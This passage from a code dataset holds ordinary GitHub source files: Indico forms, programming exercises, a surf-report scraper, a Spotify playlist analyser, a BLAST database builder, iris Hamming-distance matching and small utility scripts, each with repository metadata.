coerce=lambda x: x or None)\n # Themes\n use_custom_css = BooleanField(_('Use custom CSS'), widget=SwitchWidget(),\n description=_('Use a custom CSS file as a theme for the conference page. Deactivate '\n 'this option to reveal the available Indico themes.'))\n theme = SelectField(_('Theme'), [Optional(), HiddenUnless('use_custom_css', False)],\n coerce=lambda x: (x or None),\n description=_('Currently selected theme of the conference page. Click on the Preview button to '\n 'preview and select a different one.'))\n\n def __init__(self, *args, **kwargs):\n self.event = kwargs.pop('event')\n super().__init__(*args, **kwargs)\n self.timetable_theme.choices = [('', _('Default'))] + _get_timetable_theme_choices(self.event)\n self.theme.choices = _get_conference_theme_choices()\n\n def validate_use_custom_css(self, field):\n if field.data and not self.event.has_stylesheet:\n raise ValidationError(_('Cannot enable custom stylesheet unless there is one.'))\n\n\nclass LectureMeetingLayoutForm(LoggedLayoutForm):\n name_format = IndicoEnumSelectField(_('Name format'), enum=NameFormat, none=_('Inherit from user preferences'),\n description=_('Format in which names are displayed'))\n timetable_theme = SelectField(_('Timetable theme'), [DataRequired()])\n\n def __init__(self, *args, **kwargs):\n event = kwargs.pop('event')\n super().__init__(*args, **kwargs)\n self.timetable_theme.choices = _get_timetable_theme_choices(event)\n\n\nclass LogoForm(IndicoForm):\n logo = EditableFileField('Logo', accepted_file_types='image/jpeg,image/jpg,image/png,image/gif',\n add_remove_links=False, handle_flashes=True, get_metadata=get_logo_data,\n description=_(\"Logo to be displayed next to the event's title\"))\n\n\nclass CSSForm(IndicoForm):\n css_file = EditableFileField(_('Custom CSS file'), accepted_file_types='.css', add_remove_links=False,\n get_metadata=get_css_file_data, handle_flashes=True)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n url = f'{config.CONFERENCE_CSS_TEMPLATES_BASE_URL}/standard.css'\n link = f\"\"\n self.css_file.description = _('If you want to fully customize your conference page you can create your own '\n 'stylesheet and upload it. 
An example stylesheet can be downloaded '\n '{link}here{endlink}').format(link=link, endlink='')\n\n\nclass MenuBuiltinEntryForm(IndicoForm):\n custom_title = BooleanField(_('Custom title'), widget=SwitchWidget())\n title = StringField(_('Title'), [HiddenUnless('custom_title'), DataRequired()])\n is_enabled = BooleanField(_('Show'), widget=SwitchWidget())\n\n def __init__(self, *args, **kwargs):\n entry = kwargs.pop('entry')\n super().__init__(*args, **kwargs)\n self.custom_title.description = _(\"If you customize the title, that title is used regardless of the user's \"\n 'language preference. The default title {title} is '\n \"displayed in the user's language.\").format(title=entry.default_data.title)\n\n def post_validate(self):\n if not self.custom_title.data:\n self.title.data = None\n\n\nclass MenuUserEntryFormBase(IndicoForm):\n title = StringField(_('Title'), [DataRequired()])\n is_enabled = BooleanField(_('Show'), widget=SwitchWidget())\n new_tab = BooleanField(_('Open in a new tab'), widget=SwitchWidget())\n protection_mode = IndicoProtectionField(_('Protection mode'), protected_object=lambda form: form.protected_object)\n acl = PrincipalListField(\n _('Access control list'),\n [HiddenUnless('protection_mode', ProtectionMode.protected, preserve_data=True)],\n event=lambda form: form.event,\n allow_groups=True,\n allow_event_roles=True,\n allow_category_roles=True,\n allow_registration_forms=True,\n )\n speakers_can_access = BooleanField(\n _('Grant speakers access'),\n [HiddenUnless('protection_mode', ProtectionMode.protected, preserve_data=True)],\n widget=SwitchWidget(),\n description=_('In addition to anyone listed in the Access control list, speakers will have access.'),\n )\n\n def __init__(self, *args, event, **kwargs):\n self.event = event\n self.protected_object = kwargs.get('entry', MenuEntry(event=event))\n super().__init__(*args, **kwargs)\n\n def __iter__(self):\n # keep acl fields last when rendering the form\n return iter(sorted(super().__iter__(),\n key=lambda x: x.short_name in ('protection_mode', 'acl', 'speakers_can_access')))\n\n\nclass MenuLinkForm(MenuUserEntryFormBase):\n link_url = URLField(_('URL'), [DataRequired()])\n\n\nclass MenuPageForm(MenuUserEntryFormBase):\n html = TextAreaField(_('Content'), [DataRequired()], widget=TinyMCEWidget(images=True))\n\n def __init__(self, *args, editor_upload_url, **kwargs):\n self.editor_upload_url = editor_upload_url\n super().__init__(*args, **kwargs)\n\n\nclass AddImagesForm(IndicoForm):\n image = FileField('Image', multiple_files=True, accepted_file_types='image/jpeg,image/jpg,image/png,image/gif')\n\n\nclass CSSSelectionForm(IndicoForm):\n theme = SelectField(_('Theme'), [Optional()], coerce=lambda x: (x or None))\n\n def __init__(self, *args, **kwargs):\n event = kwargs.pop('event')\n super().__init__(*args, **kwargs)\n self.theme.choices = _get_conference_theme_choices()\n if event.has_stylesheet:\n custom = [('_custom', _('Custom CSS file ({name})').format(name=event.stylesheet_metadata['filename']))]\n self.theme.choices += custom\n","repo_name":"indico/indico","sub_path":"indico/modules/events/layout/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":10750,"program_lang":"python","lang":"en","doc_type":"code","stars":1560,"dataset":"github-code","pt":"31"} +{"seq_id":"27014349969","text":"'''\nEJERCICIO 18 Crear una aplicación de escritorio con dos cajas de\ntexto y un botón, de modo que al presionarlo se\nimprima en pantalla la suma de los dos números\ningresados en las primeras. 
La disposición de los\ncontroles y el tamaño de la ventana son a elección\ndel alumno.\n'''\n\nimport tkinter as tk\n\n\n###################################################\n\ndef convertir(dato):\n if dato.isdecimal():\n dato = int(dato)\n else:\n dato = \"error\"\n return dato\n\n\ndef sumar():\n # Obtenemos el texto ingresado por el usuario en cada caja\n # y lo convertimos a un entero para poder sumarlo.\n a = caja_a.get()\n a = convertir(a)\n b = caja_b.get()\n b = convertir(b)\n if a != \"error\" and b != \"error\":\n print(a + b)\n else:\n print(\"No se puede realizar\")\n\n\n###################################################\nimport tkinter as tk\n\nventana = tk.Tk()\nventana.config(width=250, height=200)\nventana.title(\"Ejemplo\")\n\ncaja_a = tk.Entry()\ncaja_a.place(x=20, y=20, width=50, height=25)\n\ncaja_b = tk.Entry()\ncaja_b.place(x=20, y=60, width=50, height=25)\n\nboton = tk.Button(text=\"Sumar\", command=sumar)\nboton.place(x=20, y=100)\n\nventana.mainloop()\n\n\n\n'''\nEJERCICIO 19 Escribir una función que sirva para multiplicar cada elemento\nde una lista numérica por un valor. Y devuelva la nueva lista con\ncada elemento en su respectiva posición, pero ya multiplicado.\n'''\ndef multiplicar(lista,valor):\n nueva = []\n for n in lista:\n resultado = n * valor\n nueva.append(resultado)\n return nueva\n\n\n############################\n\n#Valores de ejemplo\n\nnumeros = [10,5,3,20]\nm = 5\n\nprint(multiplicar(numeros,m))\n","repo_name":"matiasrepo/Phytonlearn","sub_path":"Modulo 3-4-5/ejercicio18.py","file_name":"ejercicio18.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18735654219","text":"#\n# @lc app=leetcode id=27 lang=python3\n#\n# [27] Remove Element\n#\n\n# @lc code=start\nclass Solution:\n def removeElement(self, nums: list[int], val: int) -> int:\n i = 0\n c = 0\n while i Dict[str, Any]:\n \"\"\"\n Override the base function because evaluation of the extrinsics is \"independent\" to the validation split,\n So all process isn't applied to both the dataloader and predictions, that comes from the \"validation\" split.\n\n Parameters\n ----------\n output : torch.Tensor\n Not used\n dataloaders : torch.Tensor\n Not used\n prefixes : List[str]\n Use only one keyword\n verbose : bool\n Always True\n\n Returns\n -------\n Dict[str, np.ndarray]\n Dictionary with metrics\n \"\"\"\n\n prefixes = [self.extrinsics_exe.dataset]\n\n # compute all error\n df = self.extrinsics_exe.compute(extrinsics_net_instance=self.current_extrinsics_net_instance)\n # reduced_data = List[ Dict[\"task\", nd.array(dim)] ] --> to self.print()\n reduced_data = [self.extrinsics_exe.get_statics_per_camera(prefix=self.__name, add_std=True)]\n # metrics_dict = Dict[\"task\", Any] --> to wandb logger\n metrics_dict = self.create_metrics_dict(reduced_data, prefixes) # for wandb tracking\n metrics_dict.update({\"calib_extrinsics\": wandb.Image(self.extrinsics_exe.to_figure())})\n\n if verbose:\n self.print(reduced_data, prefixes)\n\n if self.save_csv_dir != \"\":\n self.extrinsics_exe.to_csv(\n os.path.join(self.save_csv_dir, \"val_extrinsic_\" + str(self.csv_serial_num).zfill(3)) + \".csv\")\n self.csv_serial_num += 1\n pass\n\n # Refresh the current extrinsics-model\n self.current_extrinsics_net_instance = None\n return metrics_dict\n\n def evaluate(self, batch, output: Dict[str, Any], task, flipped_output) -> tuple:\n \"\"\"\n Update the current status of extrinsics; memorize as 
self.current_extrinsics_net_instance.\n\n Parameters\n ----------\n batch : Dict[str, Any]\n Not used\n output : Dict[str, Any]\n Register output[\"extrinsics_net\"] at the first time loop\n For this, the return of forward() implemented in the model class must have 'extrinsics_net',\n such that model.foward() return dict[\"predictions\"][\"extrinsics_net\"]\n task : str\n Not used\n flipped_output : Any (or None)\n Not used\n\n Returns\n -------\n Tuple[Dict[str, torch.Tensor]]\n The tuple of dictionary, but not used for this evaluation class here\n \"\"\"\n metrics, predictions = {}, {}\n if self.current_extrinsics_net_instance is None:\n self.current_extrinsics_net_instance = output[\"extrinsics_net\"] # Receive extrinsics_net\n else:\n pass\n return metrics, predictions # (e.g.) Dict[\"metric\": torch.tensor([b, dim_criterion])]\n","repo_name":"TRI-ML/vidar","sub_path":"vidar/metrics/extrinsics.py","file_name":"extrinsics.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"31"} +{"seq_id":"73416787287","text":"#fn + F5 to run the program\n\ndef fact_iter(n):\n ans = 1\n for i in range(1, n+1):\n ans *= i\n \n return ans\n\ndef fact(n):\n \n if(n == 1 or n == 0):\n return 1\n return n * fact(n-1)\n\nprint(fact(5))\nprint(fact_iter(5))","repo_name":"tdishant/NPTEL-Joy-of-Computing-Using-Python","sub_path":"Week-6/Week6_3.py","file_name":"Week6_3.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23453373609","text":"# https://www.acmicpc.net/problem/1854\nimport sys\nfrom heapq import heappush, heappop\nfrom collections import defaultdict\n\nread = sys.stdin.readline\nn, m, k = map(int, read().split())\nINF = float(\"inf\")\nnodes = defaultdict(list)\nfor _ in range(m):\n a, b, c = map(int, read().split())\n nodes[a].append((b, c))\n\n\ndef run(start):\n dist = [[INF] * (k) for _ in range(n + 1)]\n q = []\n dist[start][0] = 0\n heappush(q, (0, start))\n while q:\n cost, node = heappop(q)\n # if dist[cnt][node] > cost:\n # continue\n for nxt_n, c in nodes[node]:\n nxt_c = cost + c\n # k번째로 작은 값과 비교\n if dist[nxt_n][k - 1] > nxt_c:\n dist[nxt_n][k - 1] = nxt_c\n heappush(q, (nxt_c, nxt_n))\n # 각 node의 거리값들을 정렬, 혹은 - 를 붙여 heap이용\n dist[nxt_n].sort()\n return dist\n\n\ndist = run(1)\nfor val in dist[1:]:\n print(val[k - 1] if val[k - 1] != INF else -1)\n","repo_name":"yeoV/Algorithm","sub_path":"백준/다익스트라/1854.k번째최단경로.py","file_name":"1854.k번째최단경로.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11707303006","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport pandas as pd\nfrom datetime import datetime\n\nclass scrapper_class:\n def __init__(self, departement, heure):\n self.departement = departement.lower()\n self.heure = heure\n self.fichier_lat_long_par_spot = pd.read_csv('lat_long_spots.csv', index_col=False)\n\n def scrapper_function(self):\n response = requests.get(\"https://www.surf-sentinel.com/spots-de-surf/france/liste-spots-de-surf-\" + self.departement)\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n communes = []\n spots = []\n\n for i in soup.find_all(\"div\", class_=\"location-content\") :\n url = str(i.find(\"div\").find(\"a\"))\n commune_avec_slash = str(re.search(self.departement + \"/[\\w-]+\", url).group(0)).replace(self.departement,'')\n 
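#e.g. for departement \"landes\" an href containing \"landes/seignosse/les-estagnots\"\n            #is split below into the commune slug and the spot slug (illustrative values only)\n            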
spot_url = str(re.search(self.departement + \"/[\\w-]+/[\\w-]+\", url).group(0)).replace(commune_avec_slash,'').replace(self.departement,'').replace(\"/\",\"\")\n commune_url = commune_avec_slash.replace('/','')\n\n communes.append(commune_url)\n\n if spot_url == '' :\n spots.append(commune_url)\n else :\n spots.append(spot_url)\n\n spots_main_data = pd.DataFrame()\n spots_main_data['commune'] = communes\n spots_main_data['spot'] = spots\n spots_main_data['full_name'] = spots_main_data['commune'] + ' ' + spots_main_data['spot']\n spots_main_data['url'] = 'https://www.surf-sentinel.com/surf-report/france/' + self.departement + '/' + spots_main_data['commune'] + '/' + spots_main_data['spot']\n\n url = []\n date = []\n heure = []\n qualité_des_vagues = []\n conditions = []\n level = []\n hauteur = []\n note = []\n\n for spot_url in spots_main_data['url'] :\n meteo_spot_web_page = requests.get(spot_url)\n soup_url = BeautifulSoup(meteo_spot_web_page.content, \"html.parser\")\n\n for i in soup_url.find_all(\"div\", class_=\"detailed-report-box hidden gocenter\") :\n date_url = str(re.search(\"box-\\d+-\\d+-\\d+-\\d+\", str(i)).group(0)).replace('box-','')\n url.append(spot_url)\n date.append(date_url[0:10])\n heure.append(date_url[11:].replace('0',''))\n\n qualité_des_vagues_desc = str(re.search(\"strong>\\w','').replace('\\d','').replace('= len(maps) or c < 0 or c >= len(maps[0]) or (r, c) in visited or maps[r][c] == 'X':\n return 0\n if (r, c) not in visited:\n visited.add((r, c))\n return int(maps[r][c]) + dfs(r+1, c) + dfs(r-1, c) + dfs(r, c+1) + dfs(r, c-1) \n \n for row in range(len(maps)):\n for col in range(len(maps[0])):\n if maps[row][col] != 'X' and (row, col) not in visited:\n answer.append(dfs(row, col))\n \n return sorted(answer) if answer else [-1]","repo_name":"Liebestraum1/Algorithm_Python","sub_path":"Programmers/Level_2/무인도 여행.py","file_name":"무인도 여행.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36758950289","text":"import sys\nimport config\n#from util import *\nimport spotipy\nimport spotipy.util as util\nimport time\nimport json\nimport pandas as pd\n#from tqdm import tqdm\nimport matplotlib.pyplot as plt\nplt.style.use('classic')\nimport numpy as np\nimport seaborn as sns\n\nglobal args\nglobal token\nglobal playlist_uri\nglobal scope\nglobal analyze\nglobal num\n\ntoken = ''\nscope = 'user-library-read, user-read-playback-state, user-modify-playback-state'\n\n#Modify this to get more info (may time out on large playlists)\nanalyze = False\n\nnum = 10\n\nplt.close(\"all\")\nsns.set()\nsns.set_theme()\n\n#HOW TO RUN ON COMMANDLINE:\n#When using command line, playlist link must always be used and placed as last arg\n\n#To analyze N tracks from a specific playlist: 'N True '\n#To only get N tracks from a specific playlist: 'N \n#To only get from a specific playlist: ''\n#DEFAULT: To get playlist specified in config.py: Empty commandline\n\n#Sets up spotipy authorization token\ndef spotStart():\n print('spotStart called')\n global token\n token = util.prompt_for_user_token(config.username,\n scope,\n client_id=config.SP_CLIENT_ID,\n client_secret=config.SP_CLIENT_SECRET,\n redirect_uri=config.SP_REDIRECT_URI)\n print('token created as ', token)\n\n#Iterates through playlist and returns a list of lists containing each track's artist name, track name, album release date, and track popularity\ndef iterate_tracks(results, analyze):\n features = []\n #DO THIS FOR PROGRESS 
BARS\n #for i, item in enumerate(tqdm(results['items'])):\n\n for i, item in enumerate(results['items']):\n track = item['track']\n #Check if track was uploaded from a local file (local files don't have features)\n if not track['is_local']:\n album = sp.album(track['album']['id'])\n print(\n \" %d %32.32s %s %d\" %\n (i, track['artists'][0]['name'], track['name'], track['popularity']))\n info = [track['artists'][0]['name'], track['name'], album['release_date'], track['popularity']]\n if analyze:\n analysis = list(sp.audio_features(track['uri'])[0].values())\n features.append(info + analysis)\n else:\n features.append(info)\n return features\n\n#Prints the list of lists generated by iterate_tracks()\ndef show_features(results):\n for i, item in enumerate(results):\n print(\n \" %d %s\" %\n (i, results[i]))\n\n#Assembles a data frame\ndef df_tracks(tracklist, analyze):\n if(analyze):\n df = pd.DataFrame(tracklist, columns=['artist',\n 'track_name',\n 'release_date', 'popularity'] + list(sp.audio_features('7tr2za8SQg2CI8EDgrdtNl')[0].keys()))\n\n df.rename(columns={'uri':'song_uri'}, inplace=True)\n\n #df.drop_duplicates(subset=['artist', 'track', 'release_date'], inplace=True)\n\n # Reorder the cols to have identifiers first, auditory features last\n cols = ['artist', 'track_name', 'release_date', 'popularity'\n 'analysis_url', 'type', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness',\n 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo', 'duration_ms', 'time_signature']\n return df\n else:\n df = pd.DataFrame(tracklist, columns=['artist',\n 'track_name',\n 'release_date', 'popularity'])\n\n # Reorder the cols to have identifiers first, auditory features last\n cols = ['artist', 'track_name', 'release_date', 'popularity']\n return df\n\n#Prints n artists with highest occurences\ndef df_nlargest(df, n):\n freq = df.groupby([df.index, 'artist']).count().plot(kind='bar')\n print(freq)\n\n#Graphs n artists in df by occurences\ndef graph_nlargest(df, n):\n ax = sns.countplot(x=\"artist\", data=df, order=df.artist.value_counts().iloc[:n].index)\n plt.show()\n\nprint ('Python program is starting...')\nif __name__ == '__main__':\n args = sys.argv\n print ('Args: ', str(args))\n\n #Get num, analyze and playlist link from commandline\n if len(args) > 3:\n num = int(args[1])\n analyze = args[2]\n playlist_uri = args[3]\n #Else get num and playlist link from commandline\n elif len(args) > 2:\n num = int(args[1])\n playlist_uri = args[2]\n #Else only get playlist link from commandline\n elif len(args) > 1:\n playlist_uri = args[1]\n #Else, get playlist link from config file\n else:\n playlist_uri = config.playlist_uri\n\n spotStart()\n sp = spotipy.Spotify(auth=token)\n playlist = sp.playlist(playlist_uri, market=None, additional_types=('track',))\n print(\"Playlist: \", playlist['name'])\n results = sp.playlist(playlist['id'], fields=\"tracks,next\")\n\n #Make list of playlist's tracks\n tracks = results['tracks']\n #Create list of first tracks in tracks\n features = iterate_tracks(tracks, analyze)\n #Since sp.playlist returns first 100 tracks, iterate through tracks['next'] to get next 100\n while tracks['next']:\n tracks = sp.next(tracks)\n features.extend(iterate_tracks(tracks, analyze))\n\n #DEBUG\n #show_features(features)\n\n #Build data frame\n df = df_tracks(features, analyze)\n\n #Graph by artist occurences\n graph_nlargest(df, 
num)\n","repo_name":"jvetting/bool-box","sub_path":"Python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14031998401","text":"import pandas as pd\nimport numpy as np\nimport torch\n \ndef get_iris():\n # Load and process data\n data = pd.read_csv('./data/iris.csv')\n data_size = len(data)\n # Map Iris variety to numerical label\n data.loc[data['variety'] == 'Versicolor', 'variety'] = 0\n data.loc[data['variety'] == 'Virginica', 'variety'] = 1\n data.loc[data['variety'] == 'Setosa', 'variety'] = 2\n # Shuffle data, split to train and test set\n data = data.iloc[torch.randperm(data_size), :]\n X, y = (torch.tensor(data.iloc[:, 0:-1].to_numpy()),\n torch.tensor(data.iloc[:, [-1]].to_numpy(dtype = np.int64)))\n return X, y\n\ndef get_clusters_2D(num_clusters, sigma_diag = 0.2, radius = 1, num_examples = 600):\n '''\n num_clusters: number of clusters\n sigma_diag: \n '''\n pi = torch.acos(torch.zeros(1)).item()*2\n # Mu and Sigma for Gaussian distributions\n mu = torch.cat(\n [radius*torch.cos(torch.arange(num_clusters)*2*pi/num_clusters).unsqueeze(dim = 1),\n radius*torch.sin(torch.arange(num_clusters)*2*pi/num_clusters).unsqueeze(dim = 1)],\n dim = 1)\n sigma = sigma_diag*torch.tensor([[1., 0.], [0., 1.]])\n # Sample from Gaussian distributions\n examples_per_cluster = torch.tensor(num_examples/num_clusters, dtype = torch.int)\n X = torch.cat([torch.distributions.multivariate_normal.MultivariateNormal(mu[cluster, :], sigma).sample([examples_per_cluster]) for cluster in range(num_clusters)], dim = 0)\n y = torch.cat([torch.tensor([[cluster]]*examples_per_cluster) for cluster in range(num_clusters)], dim = 0)\n # Shuffle data\n shuffle_index = torch.randperm(X.size()[0])\n X, y = X[shuffle_index], y[shuffle_index]\n return X, y","repo_name":"votrinhan88/self-studying","sub_path":"machine-learning/utils_data.py","file_name":"utils_data.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12893584935","text":"import os,subprocess\nfrom pathlib import Path\n\nclass DATABASE:\n\n def __init__(self, testset, dataset):\n self.testset = testset\n self.dataset = dataset\n\n def removedup(self):\n small_content = []\n larget_content = {}\n with open(self.testset, \"r\") as smallFile:\n oneline = smallFile.readline()\n temp = []\n while oneline:\n if not oneline.strip(\"\\n\").strip():\n oneline = smallFile.readline()\n continue\n if oneline.startswith(\">\"):\n if temp:\n small_content.append(\"\".join(temp))\n temp = []\n else:\n temp.append(oneline.strip('\\n'))\n oneline = smallFile.readline()\n small_content.append(\"\".join(temp))\n with open(self.dataset, \"r\") as largeFile:\n oneline = largeFile.readline()\n temp = []\n entire = []\n while oneline:\n if not oneline.strip(\"\\n\").strip():\n oneline = largeFile.readline()\n continue\n if oneline.startswith(\">\"):\n if entire:\n larget_content.update({\"\".join(temp): \"\".join(entire)})\n temp = []\n entire = []\n else:\n temp.append(oneline.strip(\"\\n\"))\n entire.append(oneline)\n oneline = largeFile.readline()\n larget_content.update({\"\".join(temp): \"\".join(entire)})\n\n print(\"Before removing, the number of larger dataset is \"+ str(len(larget_content)))\n\n for each in small_content:\n if each in larget_content:\n del larget_content[each]\n\n print(\"After removing duplicate records, the number of 
larger dataset is \" + str(len(larget_content)))\n # windows path\n # clean_dataset = str(Path().absolute()) + \"\\database\\blast_database\"\n # if not os.path.exists(str(Path().absolute()) + \"\\database\\\"):\n # os.makedirs(str(Path().absolute()) + \"\\database\\\")\n clean_dataset = str(Path().absolute())+\"/database/blast_database\"\n if not os.path.exists(str(Path().absolute()) + \"/database/\"):\n os.makedirs(str(Path().absolute()) + \"/database/\")\n with open(clean_dataset, \"w\") as result:\n result.writelines(larget_content.values())\n\n print(\"done!\")\n return clean_dataset\n\n def makedb(self, input):\n # windows path\n # make_db_output = str(Path().absolute()) + \"\\database\\blast_database\"\n # blast_database_exe = str(Path().absolute()) + \"\\tools\\ncbi-blast-2.9.0+\\bin\\makeblastdb\"\n make_db_output= str(Path().absolute())+ \"/database/blast_database\"\n blast_database_exe=str(Path().absolute())+\"/tools/ncbi-blast-2.9.0+/bin/makeblastdb\"\n subprocess.call([blast_database_exe,\"-in\",input,\"-title\",make_db_output,\"-dbtype\",\"prot\"])\n\n def compute(self):\n output = self.removedup()\n self.makedb(output)\n os.remove(output)\n\n","repo_name":"shivashamloo/tcp-follow_up","sub_path":"making_database.py","file_name":"making_database.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32976764392","text":"import numpy as np\nfrom utils.image import valueImageToBoolean\n\n\"\"\"\nDescription:\n Calculates Hamming Distance between two bit sequences taking into consideration\n masking bit seqence.\n\nArguments:\n * testedSeq - bit seqence that is tested - array of 0 and 1\n * testedMaskSeq - bit sequence for noise mask of tested bit sequence\n * modelSeq - bit sequence that tested seq is tested against - array of 0 and 1\n * maskSeq - bit sequence for determining whether to count the difference or not - array of 0 and 1\n\nReturns:\n * HD - hamming distance value (0; 1)\n\"\"\"\n\n# Shifts by two bits (assuming one Gabor filter is used - if more are used, the sequences\n# should be shifted by 2*N where N is the number of used Gabor filters)\ndef shiftBitSequenceLeft(sequence, bitWidth=2):\n leftShift = np.concatenate((sequence[bitWidth:], sequence[0:bitWidth]))\n\n return leftShift\n\ndef shiftBitSequenceRight(sequence, bitWidth=2):\n rightShift = np.concatenate((sequence[-bitWidth:], sequence[:-bitWidth]))\n\n return rightShift\n\ndef calcHammingDistance(testedSeq, testedMask, modelSeq, modelMask):\n # Masks - 0 refers to masked, insignificant bit, 1 refers to significant bit\n # Bitwise and will create a mask that combines both masked regions\n # Bitwise or would cause the masked regions to be overriden by value '1'\n mask = np.bitwise_and(testedMask, modelMask)\n numberOfCheckedBits = np.sum(mask==True)\n\n matches = np.count_nonzero(np.bitwise_and(np.bitwise_xor(testedSeq, modelSeq), mask))\n\n hd = matches / numberOfCheckedBits\n\n # Temporary fix for NaN HD - caused by faulty segmentation when mask if totally black\n if (np.isnan(hd)):\n hd = 2.0\n\n return float(hd)\n\n# From image to Boolean (+ reshape to vector, but im not sure if required)\n# Add shifting logic\n\ndef calcHammingWithShifts(testedSeq, testedMask, modelSeq, modelMask, shiftsNumber):\n results = []\n testedSeqShiftedLeft = testedSeqShiftedRight = testedSeq.copy()\n testedMaskShiftedLeft = testedMaskShiftedRight = testedMask.copy()\n\n results.append(calcHammingDistance(testedSeq, testedMask, 
modelSeq, modelMask))\n\n if shiftsNumber > 0:\n for i in range(1, shiftsNumber + 1):\n testedSeqShiftedLeft = shiftBitSequenceLeft(testedSeqShiftedLeft)\n testedSeqShiftedRight = shiftBitSequenceRight(testedSeqShiftedRight)\n testedMaskShiftedLeft = shiftBitSequenceLeft(testedMaskShiftedLeft)\n testedMaskShiftedRight = shiftBitSequenceRight(testedMaskShiftedRight)\n\n results.append(calcHammingDistance(testedSeqShiftedLeft, testedMaskShiftedLeft, modelSeq, modelMask))\n results.append(calcHammingDistance(testedSeqShiftedRight, testedMaskShiftedRight, modelSeq, modelMask))\n\n return results\n\ndef hamming_distance(testedSeq, testedMask, modelSeq, modelMask, shiftsNumber, acceptedHammingDist):\n testedSeq = valueImageToBoolean(testedSeq.flatten())\n testedMask = valueImageToBoolean(testedMask.flatten())\n modelSeq = valueImageToBoolean(modelSeq.flatten())\n modelMask = valueImageToBoolean(modelMask.flatten())\n\n hammingDistances = calcHammingWithShifts(testedSeq, testedMask, modelSeq, modelMask, shiftsNumber)\n\n minHammingDistance = np.amin(np.asarray(hammingDistances))\n\n return {\n 'isMatched': bool(minHammingDistance <= acceptedHammingDist),\n 'minDistanceValue': minHammingDistance,\n 'hammingDistances': hammingDistances,\n }\n","repo_name":"jakublamprecht/irisRecognition","sub_path":"server/processing/matching/hamming.py","file_name":"hamming.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37385703977","text":"import csv\r\n\r\n\r\ndef ground_file(filename):\r\n ground = {}\r\n with open(filename,'r') as f:\r\n csvfile = csv.reader(f)\r\n for lines in csvfile:\r\n ground[lines[0]] = float(lines[1])\r\n\r\n print(\"ground vales :\", len(ground))\r\n return ground\r\n\r\n\r\ndef accuracy(ground,mal_filename):\r\n mal = {}\r\n with open(mal_filename,'r') as f:\r\n csvfile = csv.reader(f)\r\n for lines in csvfile:\r\n mal[lines[0]] = float(lines[1])\r\n if mal[lines[0]] <0:\r\n mal[lines[0]] = 0\r\n \r\n wr_dec = 0\r\n crr_dec = 0\r\n missing = 0\r\n x = []\r\n for i in ground:\r\n if i not in mal:\r\n missing +=1\r\n else:\r\n if abs(mal[i] - ground[i]) >=1:\r\n wr_dec +=1\r\n x.append(abs(mal[i]-ground[i]))\r\n else:\r\n crr_dec+=1\r\n x.sort()\r\n print(x)\r\n print(\"total decoded values: \", len(mal))\r\n print(\"Wrongly decoded values: \", wr_dec)\r\n print(\"Correctly decoded values: \", crr_dec)\r\n print(\"missing values: \", missing)\r\n\r\n\r\n\r\nground = ground_file('ground.csv')\r\n\r\nprint(\"\\nunique error:\")\r\naccuracy(ground,'unique.csv')\r\ntry:\r\n print(\"\\nNormal error:\")\r\n accuracy(ground,'normal.csv')\r\n\r\n print(\"\\nRelay error:\")\r\n accuracy(ground,'relay.csv')\r\n\r\n print(\"\\nrelay with random error:\")\r\n accuracy(ground,'random.csv')\r\nexcept:\r\n print(\"done\")\r\n\r\n","repo_name":"inAJam/Bloomfilter","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6590984873","text":"import sys\nimport os\n\nsys.path.insert(0, os.path.abspath('../../'))\nos.environ['DJANGO_SETTINGS_MODULE'] = 'picview.picview_settings_example'\n\n\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.intersphinx',\n]\n\n\ntemplates_path = ['_templates']\nsource_suffix = '.rst'\nmaster_doc = 'index'\n\n\nproject = 'picview'\ncopyright = '2014, Wictor Olseryd'\n\nversion = '0.1.0'\nrelease = '0.1.0'\n\nexclude_patterns = 
[]\npygments_style = 'sphinx'\nhtml_theme = 'nature'\nhtml_static_path = ['_static']\nhtmlhelp_basename = 'picviewdoc'\n\n\n\nlatex_elements = {}\nlatex_documents = [\n ('index', 'picview.tex', 'picview Documentation',\n 'Wictor Olseryd', 'manual'),\n]\n\n\nman_pages = [\n ('index', 'picview', 'picview Documentation',\n ['Wictor Olseryd'], 1)\n]\n\n\ntexinfo_documents = [\n ('index', 'picview', 'picview Documentation',\n 'Wictor Olseryd', 'picview', 'One line description of project.',\n 'Miscellaneous'),\n]\n\nintersphinx_mapping = {\n 'python': ('http://docs.python.org/', None),\n 'django': ('http://pillow.readthedocs.org/en/latest/', None),\n 'PIL': ('http://pillow.readthedocs.org/en/latest/', None),\n}\n","repo_name":"wicol/picview","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42164373478","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom tastypie.resources import ModelResource\nfrom django.contrib.auth import 